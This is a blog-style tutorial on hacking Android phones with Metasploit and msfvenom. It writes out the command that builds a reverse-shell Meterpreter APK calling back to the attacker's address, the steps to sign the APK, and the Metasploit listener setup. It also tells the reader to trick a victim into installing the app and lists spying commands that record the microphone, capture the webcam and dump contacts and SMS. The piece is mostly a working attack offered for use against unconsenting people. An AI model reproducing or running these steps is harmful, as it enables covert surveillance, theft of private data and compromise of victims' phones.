How to Hack android phone using METASPLOIT and MSFVENOM


When it comes to hacking Android phones, there are tonnes of ways for doing so. There are apps, web portals, scripts, and whatnot. We are going to guide you on how to hack an android phone using Metasploit and MSFVenom.

PS: I have already written one article on hacking android phone with spy note do read it.

So today we are going to learn about MSFVenom and how to hack an Android phone using Metasploit & MSFVenom. MSFVenom is a hacking tool used to hack any Android devices by making malicious apks. MSFVenom is made up of MSFPayload and MSFEncode. MSFEncode is the exploit tool and MSFPayload is the command line interface used to generate and output all types of shell-codes available in Metasploit.

For performing this hack you’ll need Kali Linux OS installed in your computer and Android Phone as a target.

Below are the steps to perform this hack.

Step 1: Creating apk file

Open your KALI LINUX. Open your Terminal and type in the following command

# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > hackingworld.apk

Kali Linus Command Prompt


Kali Linux Output

**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address if you don`t know.

# ifconfig

Kali Linux IP Address

Step 2: Delivering APK file to victim

  1. You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does actually installs the apk.

**If you get any signing errors or issues use the following:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk


Step 3: Metasploit setup

. Open up a new terminal and use the following command to start Metasploit framework.

# msfconsole

Metasploit Setup in Kali Linux

Now in the Metasploit framework console type the following

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

MetaSploit Framework


**LHOST= YOUR IP address

**LPORT= 4444

Now when the user opens up the app on his/her phone you will get a session with that device. And whoa! The device is yours to operate.

Step 4: Exploit..!!!

Some commands you should definitely try:

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

So, this was all about hacking an Android Phone using MSFVenom. For feedback, questions or issues, feel free to write them in the comments section.

Also Read- Top hacking Apps for Android Devices


Please enter your comment!
Please enter your name here